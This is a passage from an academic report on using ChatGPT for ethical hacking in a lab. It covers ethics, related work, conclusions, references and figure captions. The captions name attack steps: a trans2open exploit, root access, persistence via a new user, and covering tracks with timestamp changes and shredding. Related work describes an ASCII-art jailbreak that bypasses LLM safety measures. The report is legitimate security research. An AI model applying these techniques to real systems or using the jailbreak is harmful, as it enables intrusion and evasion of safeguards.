ploitation of zero-day vulnerabilities. This could inadvertently provide malicious
actors with powerful tools to exploit these vulnerabilities before they are known
to the broader security community. Moreover, the automation of processes like
social engineering by AI raises significant ethical questions. These tools could
be misused to conduct highly sophisticated and targeted cyber-attacks, blurring
the boundary between ethical hacking and malicious activity.
AI systems inherently process vast amounts of data, some of which may be
sensitive or personal; their use therefore requires strict adherence to data
privacy laws and ethical guidelines, both for the data used in training and for
the data handled during operation. This is paramount to maintaining the
integrity of cybersecurity efforts. The ethical hacking principles of “legality,
non-disclosure, and intent to do no harm” must be rigorously upheld in the AI
domain to prevent unauthorised or unintended use. Additionally, AI-facilitated
simulations of cyber-attacks for training or testing must involve fully informed
consent from all parties.
Moreover, the risk of ChatGPT generating inaccurate or fabricated information,
known as hallucination, can result in misguided decisions in cybersecurity.
This underscores the importance of human-AI collaboration, vigilant
oversight, and robust ethical standards in the field of AI-assisted cybersecurity.
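One way to make such oversight concrete is to place a review gate between the AI’s suggestions and the tester’s terminal. The Python sketch below is a minimal illustration under stated assumptions: the tool allowlist `ALLOWED_TOOLS`, the lab range `LAB_NETWORK`, and the function names are hypothetical and do not describe the setup used in this report. The gate never executes anything; it only decides whether a suggested command may be passed on to a human-controlled shell.

```python
import ipaddress
import shlex
from typing import Callable, Iterable

# Hypothetical policy values; adjust to the engagement's agreed scope.
ALLOWED_TOOLS = {"nmap", "ping", "smbclient"}
LAB_NETWORK = ipaddress.ip_network("192.168.56.0/24")
SHELL_METACHARACTERS = set(";|&`$<>")


def targets_in_scope(tokens: Iterable[str]) -> bool:
    """Return False if any token is an IP address or CIDR block outside the lab."""
    for token in tokens:
        try:
            net = ipaddress.ip_network(token, strict=False)
        except ValueError:
            continue  # token is not an address (e.g. a flag), so skip it
        if net.version != LAB_NETWORK.version or not net.subnet_of(LAB_NETWORK):
            return False
    return True


def review_suggestion(command: str, approve: Callable[[str], bool]) -> bool:
    """Accept a suggested command only if it passes the automated checks
    AND a human reviewer explicitly approves it."""
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return False  # reject chaining, redirection and substitution outright
    try:
        tokens = shlex.split(command)
    except ValueError:
        return False  # malformed quoting
    if not tokens or tokens[0] not in ALLOWED_TOOLS:
        return False
    if not targets_in_scope(tokens[1:]):
        return False
    return approve(command)
```

The automated checks are deliberately coarse and cannot detect a hallucinated flag or an inappropriate technique; they only keep obviously out-of-scope suggestions away from the reviewer, whose explicit approval remains the deciding step.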
In conclusion, combining ChatGPT’s AI capabilities with ethical hacking of-
fers a promising new frontier in cybersecurity. With its sophisticated language
processing and generation abilities, ChatGPT could revolutionise the way eth-
ical hacking is performed, making it more efficient, comprehensive, and up-to-
date with current threats. However, this technological leap forward must be
approached with caution, ensuring that its application in ethical hacking aligns
with the highest standards of security and ethical practice.

7 Related Work
The intersection of AI and cybersecurity is a highly active area of research, with
studies ranging from AI’s role in detecting intrusions to its use in offensive
security, including ethical hacking. The rise of sophisticated language models like
GPT-3, introduced by Brown et al. [5], has expanded research possibilities by
enabling strong performance on a variety of tasks, including, as we show in this
report, cybersecurity tasks. Handa et al. [9] review the application of machine
learning in cybersecurity, emphasising its role in areas like zero-day malware
detection and anomaly-based intrusion detection, while also addressing the
challenge of adversarial attacks on these algorithms. Other studies, including
that by Gupta et al. [8], examine the dual role of GenAI models like ChatGPT in
cybersecurity and privacy, highlighting both their potential for malicious use in
attacks such as social engineering and automated hacking, and their application
in enhancing cyber defence measures.
Moreover, Large Language Models (LLMs), a form of GenAI, are being applied
across various domains, including cybersecurity. For example, they are used to
fix vulnerable code [13] and to identify the root causes of incidents in cloud
environments [1]. In addition, various LLM-based tools have recently been
developed, such as Code Insight⁹ by VirusTotal, which analyses and explains the
functionality of malware written in PowerShell. Tools for vulnerability
scanning¹⁰ and penetration testing¹¹ [6] have also emerged recently.

⁹ https://blog.virustotal.com/2023/04/introducing-virustotal-code-insight.html
¹⁰ https://github.com/aress31/burpgpt
¹¹ https://github.com/GreyDGL/PentestGPT

A recent practical study by Harrison et al. [10] shows how advances in deep
learning can be used to enhance acoustic side-channel attacks against keyboards,
achieving impressive keystroke classification accuracy from audio captured with
a smartphone or over Zoom. This development poses a significant threat,
potentially enabling the theft of sensitive information such as passwords and
PINs from devices without needing physical access to the victim’s machine.
A recent panel discussion [4] also highlighted the dual role of AI in enhancing
cybersecurity while addressing the rising threat of adversarial attacks that
exploit AI system vulnerabilities.
Recent research has also identified new vulnerabilities in the security mech-
anisms of LLMs. Jiang et al. [11] introduced ‘ArtPrompt’, an innovative ASCII
art-based jailbreak attack that exploits the inability of LLMs to recognise
prompts encoded in ASCII art. This work underscores the need for further
research into the robustness of AI models, particularly as these vulnerabilities
can bypass safety measures and induce undesired behaviours in state-of-the-art
LLMs such as GPT-4 and Claude.
Park et al. [12] introduce a technique for automating the reproduction of 1-
day vulnerabilities using LLMs. Their approach involves a three-stage prompting
system, guiding LLMs through vulnerability analysis, identifying relevant in-
put fields, and generating bug-triggering inputs for use in directed fuzzing. The
method, tested on real-world programs, showed some improvements in fuzzing
performance compared to traditional methods. This research demonstrates the
potential of LLMs to enhance cybersecurity processes, particularly in automating
complex tasks such as vulnerability reproduction.
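The staged structure of such a pipeline can be sketched in Python as follows. This is a minimal illustration of chaining three prompts, assuming the model is available as a plain function from prompt text to completion text; the function name, the prompt wording, and the returned keys are hypothetical and are not taken from Park et al. [12].

```python
from typing import Callable, Dict

# Any function that maps a prompt to a completion (an assumption of this sketch).
LLM = Callable[[str], str]


def three_stage_prompting(llm: LLM, vulnerability_report: str) -> Dict[str, str]:
    """Chain three prompts, feeding each stage's output into the next."""
    # Stage 1: vulnerability analysis.
    analysis = llm(
        "Analyse the following vulnerability report and summarise the root cause:\n"
        + vulnerability_report
    )
    # Stage 2: identification of the relevant input fields.
    input_fields = llm(
        "Given this analysis, list the input fields relevant to the bug:\n"
        + analysis
    )
    # Stage 3: generation of a candidate input for use as a fuzzing seed.
    seed_input = llm(
        "Given the analysis and input fields below, propose a candidate input:\n"
        + analysis
        + "\n"
        + input_fields
    )
    return {
        "analysis": analysis,
        "input_fields": input_fields,
        "seed_input": seed_input,
    }
```

Keeping the model behind a simple callable makes it straightforward to substitute a stub during testing, or to log every intermediate output for human review before anything is passed to a fuzzer.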
Fujii and Yamagishi [7] explore the use of LLMs to support static malware
analysis, demonstrating that LLMs can achieve practical accuracy. A user study
was conducted to assess their utility and identify areas for future improvement.
Our experimental research work seeks to expand on these discussions, explor-
ing ChatGPT’s role across all stages of ethical hacking — a topic that remains
under-explored in the existing literature. We aim to provide a comprehensive
framework for integrating generative language models into ethical hacking, evi-
dencing AI’s multifaceted role in cybersecurity. We have also sought to empiri-
cally validate claims and assertions regarding the capabilities of ChatGPT in the
ethical hacking domain through a series of controlled, research-driven, lab-based
experiments.

8 Conclusions and Future Work

We have proposed an approach to enhancing ethical hacking by using GenAI,
specifically ChatGPT. This approach was validated through a comprehensive
experimental study and conceptual analysis conducted within a controlled vir-
tual environment. Our evaluation focused on key stages of penetration testing
on Linux-based target machines operating within a virtual local area network,
encompassing reconnaissance, scanning and enumeration, gaining access, main-
taining access, covering tracks, and reporting.
The study confirms that ChatGPT can significantly enhance and streamline
the ethical hacking process, particularly by providing support in decision-making
and automating repetitive tasks. However, our research also shows the critical
importance of maintaining a balanced human-AI collaboration. AI should
complement, not replace, human expertise in cybersecurity, to mitigate potential
risks such as misuse, data biases, and over-reliance on automated systems.
Looking forward, future work should explore the potential application of
AI in cybersecurity in more diverse and complex environments beyond Linux-
based systems. The work described here sets the basis for a series of future,
hands-on, research-driven experiments aimed at not only further substantiating
the claims made in this report but also at refining it to encompass a wider
array of hacking domains. Future efforts will concentrate on using ChatGPT
for penetration testing in environments running macOS, Android and iOS,
thereby broadening the reach of our research. Additionally, we plan to extend
the application of our methods across various ethical hacking fields, including
privilege escalation, wireless security, the OWASP Top 10 (web¹² and mobile¹³)
vulnerabilities, and mobile app security. Through these experiments, we will
continuously evolve the proposed ChatGPT-penetration testing model to address
the rapidly evolving landscape of cyber threats, ensuring its effectiveness against
the attack vectors of the future.

¹² https://owasp.org/www-project-top-ten/
¹³ https://owasp.org/www-project-mobile-top-10/

There is also a need to address the ethical and security challenges associated
with AI-driven tools. This includes tackling issues related to data biases, ensuring
transparency in AI decision-making processes, and enhancing AI’s adaptability
to evolving cyber threats. Continued research should focus on developing and
validating AI tools that can effectively balance automation with the necessary
human oversight. By doing so, the cybersecurity community can fully harness the
benefits of AI while safeguarding against emerging risks, ultimately contributing
to stronger and more resilient security defences.

References

1. Ahmed, T., Ghosh, S., Bansal, C., Zimmermann, T., Zhang, X., Rajmohan, S.:
Recommending root-cause and mitigation steps for cloud incidents using large
language models. In: Proceedings of 2023 IEEE/ACM 45th International
Conference on Software Engineering (ICSE). pp. 1737–1749. IEEE (2023),
https://ieeexplore.ieee.org/abstract/document/10172904/
2. Al-Sinani, H., Mitchell, C.: Unleashing AI in ethical hacking: A preliminary
experimental study. Technical report, Royal Holloway, University of London (2024),
https://pure.royalholloway.ac.uk/files/58692091/TechReport_UnleashingAIinEthicalHacking.pdf
3. Al-Sinani, H.S., Mitchell, C.J., Sahli, N., Al-Siyabi, M.: Unleashing AI in ethical
hacking. In: Proceedings of the STM 2024, the 20th International Workshop on
Security and Trust Management (co-located with ESORICS 2024), Bydgoszcz,
Poland. p. to appear. LNCS, Springer (2024),
https://www.chrismitchell.net/Papers/uaieh.pdf
4. Bertino, E., Kantarcioglu, M., Akcora, C.G., Samtani, S., Mittal, S., Gupta,
M.: AI for security and security for AI. In: Joshi, A., Carminati, B., Verma,
R.M. (eds.) CODASPY ’21: Eleventh ACM Conference on Data and Application
Security and Privacy, Virtual Event, USA, April 26–28, 2021. pp. 333–334.
ACM (2021). https://doi.org/10.1145/3422337.3450357
5. Brown, T.B., et al.: Language models are few-shot learners. In: Larochelle,
H., Ranzato, M., Hadsell, R., Balcan, M., Lin, H. (eds.) Advances in
Neural Information Processing Systems 33: Annual Conference on Neural
Information Processing Systems 2020, NeurIPS 2020, December 6–12, 2020,
virtual (2020),
https://proceedings.neurips.cc/paper/2020/hash/1457c0d6bfcb4967418bfb8ac142f64a-Abstract.html
6. Deng, G., Liu, Y., Mayoral-Vilches, V., Liu, P., Li, Y., Xu, Y., Zhang, T., Liu, Y.,
Pinzger, M., Rass, S.: PentestGPT: An LLM-empowered automatic penetration
testing tool (2023), https://arxiv.org/abs/2308.06782
7. Fujii, S., Yamagishi, R.: Feasibility study for supporting static malware
analysis using LLM. In: Proceedings of the SecAI 2024, the Workshop on Security
and Artificial Intelligence (co-located with ESORICS 2024), Bydgoszcz, Poland.
p. to appear. LNCS series, Springer (2024),
https://drive.google.com/file/d/14EW8RJnE4QUBG0mIoMVM0chzJcp1nQon/view
8. Gupta, M., Akiri, C., Aryal, K., Parker, E., Praharaj, L.: From ChatGPT to
ThreatGPT: Impact of generative AI in cybersecurity and privacy. IEEE
Access 11, 80218–80245 (2023). https://doi.org/10.1109/ACCESS.2023.3300381
9. Handa, A., Sharma, A., Shukla, S.K.: Machine learning in cybersecurity: A review.
WIREs Data Mining and Knowledge Discovery 9(4), e1306 (2019).
https://doi.org/10.1002/widm.1306
10. Harrison, J., Toreini, E., Mehrnezhad, M.: A practical deep learning-based acoustic
side channel attack on keyboards. In: IEEE European Symposium on Security and
Privacy, EuroS&P 2023 Workshops, Delft, Netherlands, July 3–7, 2023.
pp. 270–280. IEEE (2023). https://doi.org/10.1109/EuroSPW59978.2023.00034
11. Jiang, F., Xu, Z., Niu, L., Xiang, Z., Ramasubramanian, B., Li, B., Poovendran,
R.: ArtPrompt: ASCII art-based jailbreak attacks against aligned LLMs. Tech.
rep. (2024). https://doi.org/10.48550/arXiv.2402.11753
12. Park, S., Lee, H., Cha, S.K.: Systematic bug reproduction with large language
model. In: Proceedings of the SecAI 2024, the Workshop on Security and
Artificial Intelligence (co-located with ESORICS 2024), Bydgoszcz, Poland.
p. to appear. LNCS series, Springer (2024),
https://drive.google.com/file/d/14dafpfhAnp9YLb9YIC4YbVJKwTPc_dQ3/view
13. Pearce, H., Tan, B., Ahmad, B., Karri, R., Dolan-Gavitt, B.: Examining zero-shot
vulnerability repair with large language models. In: Proceedings of 2023 IEEE
Symposium on Security and Privacy (SP). pp. 2339–2356. IEEE (2023),
https://ieeexplore.ieee.org/abstract/document/10179324
14. Swanson, M., Bartol, N., Sabato, J., Hash, J., Graffo, L.: Technical guide to
information security testing and assessment (NIST SP 800-115). Special
Publication 800-115, National Institute of Standards and Technology (2008),
https://csrc.nist.gov/publications/detail/sp/800-115/final
15. Vaswani, A., Shazeer, N., Parmar, N., Uszkoreit, J., Jones, L., Gomez, A.N., Kaiser,
L., Polosukhin, I.: Attention is all you need. In: Guyon, I., von Luxburg, U.,
Bengio, S., Wallach, H.M., Fergus, R., Vishwanathan, S.V.N., Garnett, R. (eds.)
Advances in Neural Information Processing Systems 30: Annual Conference on
Neural Information Processing Systems 2017, December 4–9, 2017, Long Beach,
CA, USA. pp. 5998–6008 (2017),
https://proceedings.neurips.cc/paper/2017/hash/3f5ee243547dee91fbd053c1c4a845aa-Abstract.html
A Appendix

Fig. 1. MacBook: the physical host

Fig. 2. MacBook size

Fig. 3. VirtualBox & VMs

Fig. 4. The five ethical hacking stages

Fig. 5. Lab setup

Fig. 6. Designated IP address range

Fig. 7. Static IP address assignment

Fig. 8. Reconnaissance

Fig. 9. Network scanning

Fig. 10. Kali IP address

Fig. 11. Requesting ChatGPT to suggest commands for displaying default IP addresses

Fig. 12. Default IP addresses

Fig. 13. Requesting ChatGPT to perform device-IP address mapping

Fig. 14. Device-IP address mapping

Fig. 15. Key scanning commands

Fig. 16. The nmap command with key options

Fig. 17. Nmap scan

Fig. 18. ChatGPT guides on verifying SMB version

Fig. 19. SMB version confirmed

Fig. 20. Asking ChatGPT for vulnerability suggestions

Fig. 21. ChatGPT suggests ‘trans2open’

Fig. 22. Incompatible payload error

Fig. 23. ChatGPT suggests a fix

Fig. 24. Applying ChatGPT’s fix

Fig. 25. Root access gained

Fig. 26. Shell stabilisation and upgrade

Fig. 27. Using the bash-based terminal

Fig. 28. Meterpreter shell failure

Fig. 29. Consulting ChatGPT for guidance on maintaining persistent access

Fig. 30. ChatGPT’s recommendations for maintaining access

Fig. 31. Creating a new user

Fig. 32. New user entry in /etc/passwd

Fig. 33. Setting up a new password

Fig. 34. New hash entry in /etc/shadow

Fig. 35. New user home directory

Fig. 36. New user group membership

Fig. 37. SSH session

Fig. 38. Initial ChatGPT response on enabling public key authentication

Fig. 39. Updated ChatGPT response on enabling public key authentication

Fig. 40. Corrected ChatGPT response for enabling public key authentication

Fig. 41. Consulting ChatGPT for advice on covering tracks

Fig. 42. ChatGPT’s recommendations for covering tracks

Fig. 43. Consulting ChatGPT about modifying timestamps

Fig. 44. Modifying timestamps

Fig. 45. Consulting ChatGPT on using ‘shred’

Fig. 46. Shredding files to erase evidence

Fig. 47. Key sections of PenTest report (part 1)

Fig. 48. Key sections of PenTest report (part 2)

Fig. 49. Request to ChatGPT for a PenTest report draft based on provided details

Fig. 50. ChatGPT-produced PenTest report (part 1)

Fig. 51. ChatGPT-produced PenTest report (part 2)

Fig. 52. ChatGPT-produced PenTest report (part 3)

Fig. 53. ChatGPT-produced PenTest report (part 4)